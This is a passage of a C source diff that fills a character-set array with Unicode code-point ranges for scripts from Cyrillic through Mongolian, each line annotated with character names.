+	while (c <= 0x4ff)	// ..to CYRILLIC SMALL LETTER HA WITH STROKE
+		charset[i++] = c++;
+// 0500..052F; Cyrillic Supplement
+	c = 0x500;		// from CYRILLIC CAPITAL LETTER KOMI DE
+	while (c <= 0x52f)	// ..to CYRILLIC SMALL LETTER EL WITH DESCENDER
+		charset[i++] = c++;
+// 0530..058F; Armenian
+	c = 0x531;		// from ARMENIAN CAPITAL LETTER AYB
+	while (c <= 0x556)	// ..to ARMENIAN CAPITAL LETTER FEH
+		charset[i++] = c++;
+	c = 0x559;		// from ARMENIAN MODIFIER LETTER LEFT HALF RING
+	while (c <= 0x58a)	// ..to ARMENIAN HYPHEN
+		charset[i++] = c++;
+	charset[i++] = 0x58d;	// RIGHT-FACING ARMENIAN ETERNITY SIGN
+	charset[i++] = 0x58f;	// ARMENIAN DRAM SIGN
+// 0590..05FF; Hebrew
+	c = 0x591;		// from HEBREW ACCENT ETNAHTA
+	while (c <= 0x5c7)	// ..to HEBREW POINT QAMATS QATAN
+		charset[i++] = c++;
+	c = 0x5d0;		// from HEBREW LETTER ALEF
+	while (c <= 0x5ea)	// ..to HEBREW LETTER TAV
+		charset[i++] = c++;
+	c = 0x5ef;		// from HEBREW YOD TRIANGLE
+	while (c <= 0x5f4)	// ..to HEBREW PUNCTUATION GERSHAYIM
+		charset[i++] = c++;
+// 0600..06FF; Arabic
+	c = 0x600;		// from ARABIC NUMBER SIGN
+	while (c <= 0x61c)	// ..to ARABIC LETTER MARK
+		charset[i++] = c++;
+	c = 0x61e;		// from ARABIC TRIPLE DOT PUNCTUATION MARK
+	while (c <= 0x6ff)	// ..to ARABIC LETTER HEH WITH INVERTED V
+		charset[i++] = c++;
+// 0700..074F; Syriac
+	c = 0x700;		// from SYRIAC END OF PARAGRAPH
+	while (c <= 0x70d)	// ..to SYRIAC HARKLEAN ASTERISCUS
+		charset[i++] = c++;
+	c = 0x70f;		// from SYRIAC ABBREVIATION MARK
+	while (c <= 0x74a)	// ..to SYRIAC BARREKH
+		charset[i++] = c++;
+	charset[i++] = 0x74d;	// SYRIAC LETTER SOGDIAN ZHAIN
+	charset[i++] = 0x74f;	// SYRIAC LETTER SOGDIAN FE
+// 0750..077F; Arabic Supplement
+	c = 0x750;		// from ARABIC LETTER BEH WITH THREE DOTS HORIZONTALLY BELOW
+	while (c <= 0x77f)	// ..to ARABIC LETTER KAF WITH TWO DOTS ABOVE
+		charset[i++] = c++;
+// 0780..07BF; Thaana
+	c = 0x780;		// from THAANA LETTER HAA
+	while (c <= 0x7b1)	// ..to THAANA LETTER NAA
+		charset[i++] = c++;
+// 07C0..07FF; NKo
+	c = 0x7c0;		// from NKO DIGIT ZERO
+	while (c <= 0x7fa)	// ..to NKO LAJANYALAN
+		charset[i++] = c++;
+	charset[i++] = 0x7fd;	// NKO DANTAYALAN
+	charset[i++] = 0x7ff;	// NKO TAMAN SIGN
+// 0800..083F; Samaritan
+	c = 0x800;		// from SAMARITAN LETTER ALAF
+	while (c <= 0x82d)	// ..to SAMARITAN MARK NEQUDAA
+		charset[i++] = c++;
+	c = 0x830;		// from SAMARITAN PUNCTUATION NEQUDAA
+	while (c <= 0x83e)	// ..to SAMARITAN PUNCTUATION ANNAAU
+		charset[i++] = c++;
+// 0840..085F; Mandaic
+	c = 0x840;		// from MANDAIC LETTER HALQA
+	while (c <= 0x85b)	// ..to MANDAIC GEMINATION MARK
+		charset[i++] = c++;
+	charset[i++] = 0x85e;	// MANDAIC PUNCTUATION
+// 0860..086F; Syriac Supplement
+	c = 0x860;		// from SYRIAC LETTER MALAYALAM NGA
+	while (c <= 0x86a)	// ..to SYRIAC LETTER MALAYALAM SSA
+		charset[i++] = c++;
+// 08A0..08FF; Arabic Extended-A
+	c = 0x8a0;		// from ARABIC LETTER BEH WITH SMALL V BELOW
+	while (c <= 0x8b4)	// ..to ARABIC LETTER KAF WITH DOT BELOW
+		charset[i++] = c++;
+	c = 0x8b6;		// from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
+	while (c <= 0x8bd)	// ..to ARABIC LETTER AFRICAN NOON
+		charset[i++] = c++;
+	c = 0x8d3;		// from ARABIC SMALL LOW WAW
+	while (c <= 0x8ff)	// ..to ARABIC MARK SIDEWAYS NOON GHUNNA
+		charset[i++] = c++;
+// 0900..097F; Devanagari
+	c = 0x900;		// from DEVANAGARI SIGN INVERTED CANDRABINDU
+	while (c <= 0x97f)	// ..to DEVANAGARI LETTER BBA
+		charset[i++] = c++;
+// 0980..09FF; Bengali
+	c = 0x980;		// from BENGALI ANJI
+	while (c <= 0x983)	// ..to BENGALI SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x985;		// from BENGALI LETTER A
+	while (c <= 0x98c)	// ..to BENGALI LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x98f;	// BENGALI LETTER E
+	charset[i++] = 0x990;	// BENGALI LETTER AI
+	c = 0x993;		// from BENGALI LETTER O
+	while (c <= 0x9a8)	// ..to BENGALI LETTER NA
+		charset[i++] = c++;
+	c = 0x9aa;		// from BENGALI LETTER PA
+	while (c <= 0x9b0)	// ..to BENGALI LETTER RA
+		charset[i++] = c++;
+	c = 0x9b6;		// from BENGALI LETTER SHA
+	while (c <= 0x9b9)	// ..to BENGALI LETTER HA
+		charset[i++] = c++;
+	c = 0x9bc;		// from BENGALI SIGN NUKTA
+	while (c <= 0x9c4)	// ..to BENGALI VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x9c7;	// BENGALI VOWEL SIGN E
+	charset[i++] = 0x9c8;	// BENGALI VOWEL SIGN AI
+	c = 0x9cb;		// from BENGALI VOWEL SIGN O
+	while (c <= 0x9ce)	// ..to BENGALI LETTER KHANDA TA
+		charset[i++] = c++;
+	charset[i++] = 0x9dc;	// BENGALI LETTER RRA
+	charset[i++] = 0x9dd;	// BENGALI LETTER RHA
+	c = 0x9df;		// from BENGALI LETTER YYA
+	while (c <= 0x9e3)	// ..to BENGALI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x9e6;		// from BENGALI DIGIT ZERO
+	while (c <= 0x9fe)	// ..to BENGALI SANDHI MARK
+		charset[i++] = c++;
+// 0A00..0A7F; Gurmukhi
+	charset[i++] = 0xa01;	// GURMUKHI SIGN ADAK BINDI
+	charset[i++] = 0xa03;	// GURMUKHI SIGN VISARGA
+	c = 0xa05;		// from GURMUKHI LETTER A
+	while (c <= 0xa0a)	// ..to GURMUKHI LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xa0f;	// GURMUKHI LETTER EE
+	charset[i++] = 0xa10;	// GURMUKHI LETTER AI
+	c = 0xa13;		// from GURMUKHI LETTER OO
+	while (c <= 0xa28)	// ..to GURMUKHI LETTER NA
+		charset[i++] = c++;
+	c = 0xa2a;		// from GURMUKHI LETTER PA
+	while (c <= 0xa30)	// ..to GURMUKHI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xa32;	// GURMUKHI LETTER LA
+	charset[i++] = 0xa33;	// GURMUKHI LETTER LLA
+	charset[i++] = 0xa35;	// GURMUKHI LETTER VA
+	charset[i++] = 0xa36;	// GURMUKHI LETTER SHA
+	charset[i++] = 0xa38;	// GURMUKHI LETTER SA
+	charset[i++] = 0xa39;	// GURMUKHI LETTER HA
+	c = 0xa3e;		// from GURMUKHI VOWEL SIGN AA
+	while (c <= 0xa42)	// ..to GURMUKHI VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xa47;	// GURMUKHI VOWEL SIGN EE
+	charset[i++] = 0xa48;	// GURMUKHI VOWEL SIGN AI
+	charset[i++] = 0xa4b;	// GURMUKHI VOWEL SIGN OO
+	charset[i++] = 0xa4d;	// GURMUKHI SIGN VIRAMA
+	c = 0xa59;		// from GURMUKHI LETTER KHHA
+	while (c <= 0xa5c)	// ..to GURMUKHI LETTER RRA
+		charset[i++] = c++;
+	c = 0xa66;		// from GURMUKHI DIGIT ZERO
+	while (c <= 0xa76)	// ..to GURMUKHI ABBREVIATION SIGN
+		charset[i++] = c++;
+// 0A80..0AFF; Gujarati
+	charset[i++] = 0xa81;	// GUJARATI SIGN CANDRABINDU
+	charset[i++] = 0xa83;	// GUJARATI SIGN VISARGA
+	c = 0xa85;		// from GUJARATI LETTER A
+	while (c <= 0xa8d)	// ..to GUJARATI VOWEL CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xa8f;	// GUJARATI LETTER E
+	charset[i++] = 0xa91;	// GUJARATI VOWEL CANDRA O
+	c = 0xa93;		// from GUJARATI LETTER O
+	while (c <= 0xaa8)	// ..to GUJARATI LETTER NA
+		charset[i++] = c++;
+	c = 0xaaa;		// from GUJARATI LETTER PA
+	while (c <= 0xab0)	// ..to GUJARATI LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xab2;	// GUJARATI LETTER LA
+	charset[i++] = 0xab3;	// GUJARATI LETTER LLA
+	c = 0xab5;		// from GUJARATI LETTER VA
+	while (c <= 0xab9)	// ..to GUJARATI LETTER HA
+		charset[i++] = c++;
+	c = 0xabc;		// from GUJARATI SIGN NUKTA
+	while (c <= 0xac5)	// ..to GUJARATI VOWEL SIGN CANDRA E
+		charset[i++] = c++;
+	charset[i++] = 0xac7;	// GUJARATI VOWEL SIGN E
+	charset[i++] = 0xac9;	// GUJARATI VOWEL SIGN CANDRA O
+	charset[i++] = 0xacb;	// GUJARATI VOWEL SIGN O
+	charset[i++] = 0xacd;	// GUJARATI SIGN VIRAMA
+	c = 0xae0;		// from GUJARATI LETTER VOCALIC RR
+	while (c <= 0xae3)	// ..to GUJARATI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xae6;		// from GUJARATI DIGIT ZERO
+	while (c <= 0xaf1)	// ..to GUJARATI RUPEE SIGN
+		charset[i++] = c++;
+	c = 0xaf9;		// from GUJARATI LETTER ZHA
+	while (c <= 0xaff)	// ..to GUJARATI SIGN TWO-CIRCLE NUKTA ABOVE
+		charset[i++] = c++;
+// 0B00..0B7F; Oriya
+	charset[i++] = 0xb01;	// ORIYA SIGN CANDRABINDU
+	charset[i++] = 0xb03;	// ORIYA SIGN VISARGA
+	c = 0xb05;		// from ORIYA LETTER A
+	while (c <= 0xb0c)	// ..to ORIYA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xb0f;	// ORIYA LETTER E
+	charset[i++] = 0xb10;	// ORIYA LETTER AI
+	c = 0xb13;		// from ORIYA LETTER O
+	while (c <= 0xb28)	// ..to ORIYA LETTER NA
+		charset[i++] = c++;
+	c = 0xb2a;		// from ORIYA LETTER PA
+	while (c <= 0xb30)	// ..to ORIYA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0xb32;	// ORIYA LETTER LA
+	charset[i++] = 0xb33;	// ORIYA LETTER LLA
+	c = 0xb35;		// from ORIYA LETTER VA
+	while (c <= 0xb39)	// ..to ORIYA LETTER HA
+		charset[i++] = c++;
+	c = 0xb3c;		// from ORIYA SIGN NUKTA
+	while (c <= 0xb44)	// ..to ORIYA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xb47;	// ORIYA VOWEL SIGN E
+	charset[i++] = 0xb48;	// ORIYA VOWEL SIGN AI
+	charset[i++] = 0xb4b;	// ORIYA VOWEL SIGN O
+	charset[i++] = 0xb4d;	// ORIYA SIGN VIRAMA
+	charset[i++] = 0xb56;	// ORIYA AI LENGTH MARK
+	charset[i++] = 0xb57;	// ORIYA AU LENGTH MARK
+	charset[i++] = 0xb5c;	// ORIYA LETTER RRA
+	charset[i++] = 0xb5d;	// ORIYA LETTER RHA
+	c = 0xb5f;		// from ORIYA LETTER YYA
+	while (c <= 0xb63)	// ..to ORIYA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xb66;		// from ORIYA DIGIT ZERO
+	while (c <= 0xb77)	// ..to ORIYA FRACTION THREE SIXTEENTHS
+		charset[i++] = c++;
+// 0B80..0BFF; Tamil
+	charset[i++] = 0xb82;	// TAMIL SIGN ANUSVARA
+	charset[i++] = 0xb83;	// TAMIL SIGN VISARGA
+	c = 0xb85;		// from TAMIL LETTER A
+	while (c <= 0xb8a)	// ..to TAMIL LETTER UU
+		charset[i++] = c++;
+	charset[i++] = 0xb8e;	// TAMIL LETTER E
+	charset[i++] = 0xb90;	// TAMIL LETTER AI
+	c = 0xb92;		// from TAMIL LETTER O
+	while (c <= 0xb95)	// ..to TAMIL LETTER KA
+		charset[i++] = c++;
+	charset[i++] = 0xb99;	// TAMIL LETTER NGA
+	charset[i++] = 0xb9a;	// TAMIL LETTER CA
+	charset[i++] = 0xb9e;	// TAMIL LETTER NYA
+	charset[i++] = 0xb9f;	// TAMIL LETTER TTA
+	charset[i++] = 0xba3;	// TAMIL LETTER NNA
+	charset[i++] = 0xba4;	// TAMIL LETTER TA
+	charset[i++] = 0xba8;	// TAMIL LETTER NA
+	charset[i++] = 0xbaa;	// TAMIL LETTER PA
+	c = 0xbae;		// from TAMIL LETTER MA
+	while (c <= 0xbb9)	// ..to TAMIL LETTER HA
+		charset[i++] = c++;
+	c = 0xbbe;		// from TAMIL VOWEL SIGN AA
+	while (c <= 0xbc2)	// ..to TAMIL VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xbc6;	// TAMIL VOWEL SIGN E
+	charset[i++] = 0xbc8;	// TAMIL VOWEL SIGN AI
+	c = 0xbca;		// from TAMIL VOWEL SIGN O
+	while (c <= 0xbcd)	// ..to TAMIL SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0xbe6;		// from TAMIL DIGIT ZERO
+	while (c <= 0xbfa)	// ..to TAMIL NUMBER SIGN
+		charset[i++] = c++;
+// 0C00..0C7F; Telugu
+	c = 0xc00;		// from TELUGU SIGN COMBINING CANDRABINDU ABOVE
+	while (c <= 0xc0c)	// ..to TELUGU LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc0e;	// TELUGU LETTER E
+	charset[i++] = 0xc10;	// TELUGU LETTER AI
+	c = 0xc12;		// from TELUGU LETTER O
+	while (c <= 0xc28)	// ..to TELUGU LETTER NA
+		charset[i++] = c++;
+	c = 0xc2a;		// from TELUGU LETTER PA
+	while (c <= 0xc39)	// ..to TELUGU LETTER HA
+		charset[i++] = c++;
+	c = 0xc3d;		// from TELUGU SIGN AVAGRAHA
+	while (c <= 0xc44)	// ..to TELUGU VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xc46;	// TELUGU VOWEL SIGN E
+	charset[i++] = 0xc48;	// TELUGU VOWEL SIGN AI
+	c = 0xc4a;		// from TELUGU VOWEL SIGN O
+	while (c <= 0xc4d)	// ..to TELUGU SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xc55;	// TELUGU LENGTH MARK
+	charset[i++] = 0xc56;	// TELUGU AI LENGTH MARK
+	charset[i++] = 0xc58;	// TELUGU LETTER TSA
+	charset[i++] = 0xc5a;	// TELUGU LETTER RRRA
+	c = 0xc60;		// from TELUGU LETTER VOCALIC RR
+	while (c <= 0xc63)	// ..to TELUGU VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xc66;		// from TELUGU DIGIT ZERO
+	while (c <= 0xc6f)	// ..to TELUGU DIGIT NINE
+		charset[i++] = c++;
+	c = 0xc78;		// from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
+	while (c <= 0xc7f)	// ..to TELUGU SIGN TUUMU
+		charset[i++] = c++;
+// 0C80..0CFF; Kannada
+	c = 0xc80;		// from KANNADA SIGN SPACING CANDRABINDU
+	while (c <= 0xc8c)	// ..to KANNADA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xc8e;	// KANNADA LETTER E
+	charset[i++] = 0xc90;	// KANNADA LETTER AI
+	c = 0xc92;		// from KANNADA LETTER O
+	while (c <= 0xca8)	// ..to KANNADA LETTER NA
+		charset[i++] = c++;
+	c = 0xcaa;		// from KANNADA LETTER PA
+	while (c <= 0xcb3)	// ..to KANNADA LETTER LLA
+		charset[i++] = c++;
+	c = 0xcb5;		// from KANNADA LETTER VA
+	while (c <= 0xcb9)	// ..to KANNADA LETTER HA
+		charset[i++] = c++;
+	c = 0xcbc;		// from KANNADA SIGN NUKTA
+	while (c <= 0xcc4)	// ..to KANNADA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xcc6;	// KANNADA VOWEL SIGN E
+	charset[i++] = 0xcc8;	// KANNADA VOWEL SIGN AI
+	c = 0xcca;		// from KANNADA VOWEL SIGN O
+	while (c <= 0xccd)	// ..to KANNADA SIGN VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xcd5;	// KANNADA LENGTH MARK
+	charset[i++] = 0xcd6;	// KANNADA AI LENGTH MARK
+	c = 0xce0;		// from KANNADA LETTER VOCALIC RR
+	while (c <= 0xce3)	// ..to KANNADA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xce6;		// from KANNADA DIGIT ZERO
+	while (c <= 0xcef)	// ..to KANNADA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xcf1;	// KANNADA SIGN JIHVAMULIYA
+	charset[i++] = 0xcf2;	// KANNADA SIGN UPADHMANIYA
+// 0D00..0D7F; Malayalam
+	c = 0xd00;		// from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0xd03)	// ..to MALAYALAM SIGN VISARGA
+		charset[i++] = c++;
+	c = 0xd05;		// from MALAYALAM LETTER A
+	while (c <= 0xd0c)	// ..to MALAYALAM LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0xd0e;	// MALAYALAM LETTER E
+	charset[i++] = 0xd10;	// MALAYALAM LETTER AI
+	c = 0xd12;		// from MALAYALAM LETTER O
+	while (c <= 0xd44)	// ..to MALAYALAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0xd46;	// MALAYALAM VOWEL SIGN E
+	charset[i++] = 0xd48;	// MALAYALAM VOWEL SIGN AI
+	c = 0xd4a;		// from MALAYALAM VOWEL SIGN O
+	while (c <= 0xd4f)	// ..to MALAYALAM SIGN PARA
+		charset[i++] = c++;
+	c = 0xd54;		// from MALAYALAM LETTER CHILLU M
+	while (c <= 0xd63)	// ..to MALAYALAM VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0xd66;		// from MALAYALAM DIGIT ZERO
+	while (c <= 0xd7f)	// ..to MALAYALAM LETTER CHILLU K
+		charset[i++] = c++;
+// 0D80..0DFF; Sinhala
+	charset[i++] = 0xd82;	// SINHALA SIGN ANUSVARAYA
+	charset[i++] = 0xd83;	// SINHALA SIGN VISARGAYA
+	c = 0xd85;		// from SINHALA LETTER AYANNA
+	while (c <= 0xd96)	// ..to SINHALA LETTER AUYANNA
+		charset[i++] = c++;
+	c = 0xd9a;		// from SINHALA LETTER ALPAPRAANA KAYANNA
+	while (c <= 0xdb1)	// ..to SINHALA LETTER DANTAJA NAYANNA
+		charset[i++] = c++;
+	c = 0xdb3;		// from SINHALA LETTER SANYAKA DAYANNA
+	while (c <= 0xdbb)	// ..to SINHALA LETTER RAYANNA
+		charset[i++] = c++;
+	c = 0xdc0;		// from SINHALA LETTER VAYANNA
+	while (c <= 0xdc6)	// ..to SINHALA LETTER FAYANNA
+		charset[i++] = c++;
+	c = 0xdcf;		// from SINHALA VOWEL SIGN AELA-PILLA
+	while (c <= 0xdd4)	// ..to SINHALA VOWEL SIGN KETTI PAA-PILLA
+		charset[i++] = c++;
+	c = 0xdd8;		// from SINHALA VOWEL SIGN GAETTA-PILLA
+	while (c <= 0xddf)	// ..to SINHALA VOWEL SIGN GAYANUKITTA
+		charset[i++] = c++;
+	c = 0xde6;		// from SINHALA LITH DIGIT ZERO
+	while (c <= 0xdef)	// ..to SINHALA LITH DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xdf2;	// SINHALA VOWEL SIGN DIGA GAETTA-PILLA
+	charset[i++] = 0xdf4;	// SINHALA PUNCTUATION KUNDDALIYA
+// 0E00..0E7F; Thai
+	c = 0xe01;		// from THAI CHARACTER KO KAI
+	while (c <= 0xe3a)	// ..to THAI CHARACTER PHINTHU
+		charset[i++] = c++;
+	c = 0xe3f;		// from THAI CURRENCY SYMBOL BAHT
+	while (c <= 0xe5b)	// ..to THAI CHARACTER KHOMUT
+		charset[i++] = c++;
+// 0E80..0EFF; Lao
+	charset[i++] = 0xe81;	// LAO LETTER KO
+	charset[i++] = 0xe82;	// LAO LETTER KHO SUNG
+	charset[i++] = 0xe87;	// LAO LETTER NGO
+	charset[i++] = 0xe88;	// LAO LETTER CO
+	c = 0xe94;		// from LAO LETTER DO
+	while (c <= 0xe97)	// ..to LAO LETTER THO TAM
+		charset[i++] = c++;
+	c = 0xe99;		// from LAO LETTER NO
+	while (c <= 0xe9f)	// ..to LAO LETTER FO SUNG
+		charset[i++] = c++;
+	charset[i++] = 0xea1;	// LAO LETTER MO
+	charset[i++] = 0xea3;	// LAO LETTER LO LING
+	charset[i++] = 0xeaa;	// LAO LETTER SO SUNG
+	charset[i++] = 0xeab;	// LAO LETTER HO SUNG
+	c = 0xead;		// from LAO LETTER O
+	while (c <= 0xeb9)	// ..to LAO VOWEL SIGN UU
+		charset[i++] = c++;
+	charset[i++] = 0xebb;	// LAO VOWEL SIGN MAI KON
+	charset[i++] = 0xebd;	// LAO SEMIVOWEL SIGN NYO
+	c = 0xec0;		// from LAO VOWEL SIGN E
+	while (c <= 0xec4)	// ..to LAO VOWEL SIGN AI
+		charset[i++] = c++;
+	c = 0xec8;		// from LAO TONE MAI EK
+	while (c <= 0xecd)	// ..to LAO NIGGAHITA
+		charset[i++] = c++;
+	c = 0xed0;		// from LAO DIGIT ZERO
+	while (c <= 0xed9)	// ..to LAO DIGIT NINE
+		charset[i++] = c++;
+	c = 0xedc;		// from LAO HO NO
+	while (c <= 0xedf)	// ..to LAO LETTER KHMU NYO
+		charset[i++] = c++;
+// 0F00..0FFF; Tibetan
+	c = 0xf00;		// from TIBETAN SYLLABLE OM
+	while (c <= 0xf47)	// ..to TIBETAN LETTER JA
+		charset[i++] = c++;
+	c = 0xf49;		// from TIBETAN LETTER NYA
+	while (c <= 0xf6c)	// ..to TIBETAN LETTER RRA
+		charset[i++] = c++;
+	c = 0xf71;		// from TIBETAN VOWEL SIGN AA
+	while (c <= 0xf97)	// ..to TIBETAN SUBJOINED LETTER JA
+		charset[i++] = c++;
+	c = 0xf99;		// from TIBETAN SUBJOINED LETTER NYA
+	while (c <= 0xfbc)	// ..to TIBETAN SUBJOINED LETTER FIXED-FORM RA
+		charset[i++] = c++;
+	c = 0xfbe;		// from TIBETAN KU RU KHA
+	while (c <= 0xfcc)	// ..to TIBETAN SYMBOL NOR BU BZHI -KHYIL
+		charset[i++] = c++;
+	c = 0xfce;		// from TIBETAN SIGN RDEL NAG RDEL DKAR
+	while (c <= 0xfda)	// ..to TIBETAN MARK TRAILING MCHAN RTAGS
+		charset[i++] = c++;
+// 1000..109F; Myanmar
+	c = 0x1000;		// from MYANMAR LETTER KA
+	while (c <= 0x109f)	// ..to MYANMAR SYMBOL SHAN EXCLAMATION
+		charset[i++] = c++;
+// 10A0..10FF; Georgian
+	c = 0x10a0;		// from GEORGIAN CAPITAL LETTER AN
+	while (c <= 0x10c5)	// ..to GEORGIAN CAPITAL LETTER HOE
+		charset[i++] = c++;
+	c = 0x10d0;		// from GEORGIAN LETTER AN
+	while (c <= 0x10ff)	// ..to GEORGIAN LETTER LABIAL SIGN
+		charset[i++] = c++;
+// 1100..11FF; Hangul Jamo
+	c = 0x1100;		// from HANGUL CHOSEONG KIYEOK
+	while (c <= 0x11ff)	// ..to HANGUL JONGSEONG SSANGNIEUN
+		charset[i++] = c++;
+// 1200..137F; Ethiopic
+	c = 0x1200;		// from ETHIOPIC SYLLABLE HA
+	while (c <= 0x1248)	// ..to ETHIOPIC SYLLABLE QWA
+		charset[i++] = c++;
+	c = 0x124a;		// from ETHIOPIC SYLLABLE QWI
+	while (c <= 0x124d)	// ..to ETHIOPIC SYLLABLE QWE
+		charset[i++] = c++;
+	c = 0x1250;		// from ETHIOPIC SYLLABLE QHA
+	while (c <= 0x1256)	// ..to ETHIOPIC SYLLABLE QHO
+		charset[i++] = c++;
+	c = 0x125a;		// from ETHIOPIC SYLLABLE QHWI
+	while (c <= 0x125d)	// ..to ETHIOPIC SYLLABLE QHWE
+		charset[i++] = c++;
+	c = 0x1260;		// from ETHIOPIC SYLLABLE BA
+	while (c <= 0x1288)	// ..to ETHIOPIC SYLLABLE XWA
+		charset[i++] = c++;
+	c = 0x128a;		// from ETHIOPIC SYLLABLE XWI
+	while (c <= 0x128d)	// ..to ETHIOPIC SYLLABLE XWE
+		charset[i++] = c++;
+	c = 0x1290;		// from ETHIOPIC SYLLABLE NA
+	while (c <= 0x12b0)	// ..to ETHIOPIC SYLLABLE KWA
+		charset[i++] = c++;
+	c = 0x12b2;		// from ETHIOPIC SYLLABLE KWI
+	while (c <= 0x12b5)	// ..to ETHIOPIC SYLLABLE KWE
+		charset[i++] = c++;
+	c = 0x12b8;		// from ETHIOPIC SYLLABLE KXA
+	while (c <= 0x12be)	// ..to ETHIOPIC SYLLABLE KXO
+		charset[i++] = c++;
+	c = 0x12c2;		// from ETHIOPIC SYLLABLE KXWI
+	while (c <= 0x12c5)	// ..to ETHIOPIC SYLLABLE KXWE
+		charset[i++] = c++;
+	c = 0x12c8;		// from ETHIOPIC SYLLABLE WA
+	while (c <= 0x12d6)	// ..to ETHIOPIC SYLLABLE PHARYNGEAL O
+		charset[i++] = c++;
+	c = 0x12d8;		// from ETHIOPIC SYLLABLE ZA
+	while (c <= 0x1310)	// ..to ETHIOPIC SYLLABLE GWA
+		charset[i++] = c++;
+	c = 0x1312;		// from ETHIOPIC SYLLABLE GWI
+	while (c <= 0x1315)	// ..to ETHIOPIC SYLLABLE GWE
+		charset[i++] = c++;
+	c = 0x1318;		// from ETHIOPIC SYLLABLE GGA
+	while (c <= 0x135a)	// ..to ETHIOPIC SYLLABLE FYA
+		charset[i++] = c++;
+	c = 0x135d;		// from ETHIOPIC COMBINING GEMINATION AND VOWEL LENGTH MARK
+	while (c <= 0x137c)	// ..to ETHIOPIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 1380..139F; Ethiopic Supplement
+	c = 0x1380;		// from ETHIOPIC SYLLABLE SEBATBEIT MWA
+	while (c <= 0x1399)	// ..to ETHIOPIC TONAL MARK KURT
+		charset[i++] = c++;
+// 13A0..13FF; Cherokee
+	c = 0x13a0;		// from CHEROKEE LETTER A
+	while (c <= 0x13f5)	// ..to CHEROKEE LETTER MV
+		charset[i++] = c++;
+	c = 0x13f8;		// from CHEROKEE SMALL LETTER YE
+	while (c <= 0x13fd)	// ..to CHEROKEE SMALL LETTER MV
+		charset[i++] = c++;
+// 1400..167F; Unified Canadian Aboriginal Syllabics
+	c = 0x1400;		// from CANADIAN SYLLABICS HYPHEN
+	while (c <= 0x167f)	// ..to CANADIAN SYLLABICS BLACKFOOT W
+		charset[i++] = c++;
+// 1680..169F; Ogham
+	c = 0x1680;		// from OGHAM SPACE MARK
+	while (c <= 0x169c)	// ..to OGHAM REVERSED FEATHER MARK
+		charset[i++] = c++;
+// 16A0..16FF; Runic
+	c = 0x16a0;		// from RUNIC LETTER FEHU FEOH FE F
+	while (c <= 0x16f8)	// ..to RUNIC LETTER FRANKS CASKET AESC
+		charset[i++] = c++;
+// 1700..171F; Tagalog
+	c = 0x1700;		// from TAGALOG LETTER A
+	while (c <= 0x170c)	// ..to TAGALOG LETTER YA
+		charset[i++] = c++;
+	c = 0x170e;		// from TAGALOG LETTER LA
+	while (c <= 0x1714)	// ..to TAGALOG SIGN VIRAMA
+		charset[i++] = c++;
+// 1720..173F; Hanunoo
+	c = 0x1720;		// from HANUNOO LETTER A
+	while (c <= 0x1736)	// ..to PHILIPPINE DOUBLE PUNCTUATION
+		charset[i++] = c++;
+// 1740..175F; Buhid
+	c = 0x1740;		// from BUHID LETTER A
+	while (c <= 0x1753)	// ..to BUHID VOWEL SIGN U
+		charset[i++] = c++;
+// 1760..177F; Tagbanwa
+	c = 0x1760;		// from TAGBANWA LETTER A
+	while (c <= 0x176c)	// ..to TAGBANWA LETTER YA
+		charset[i++] = c++;
+	charset[i++] = 0x176e;	// TAGBANWA LETTER LA
+	charset[i++] = 0x1770;	// TAGBANWA LETTER SA
+	charset[i++] = 0x1772;	// TAGBANWA VOWEL SIGN I
+	charset[i++] = 0x1773;	// TAGBANWA VOWEL SIGN U
+// 1780..17FF; Khmer
+	c = 0x1780;		// from KHMER LETTER KA
+	while (c <= 0x17dd)	// ..to KHMER SIGN ATTHACAN
+		charset[i++] = c++;
+	c = 0x17e0;		// from KHMER DIGIT ZERO
+	while (c <= 0x17e9)	// ..to KHMER DIGIT NINE
+		charset[i++] = c++;
+	c = 0x17f0;		// from KHMER SYMBOL LEK ATTAK SON
+	while (c <= 0x17f9)	// ..to KHMER SYMBOL LEK ATTAK PRAM-BUON
+		charset[i++] = c++;
+// 1800..18AF; Mongolian
+	c = 0x1800;		// from MONGOLIAN BIRGA
+	while (c <= 0x180e)	// ..to MONGOLIAN VOWEL SEPARATOR
+		charset[i++] = c++;
+	c = 0x1810;		// from MONGOLIAN DIGIT ZERO
+	while (c <= 0x1819)	// ..to MONGOLIAN DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1820;		// from MONGOLIAN LETTER A
+	while (c <= 0x1878)	// ..to MONGOLIAN LETTER CHA WITH TWO DOTS
+		charset[i++] = c++;
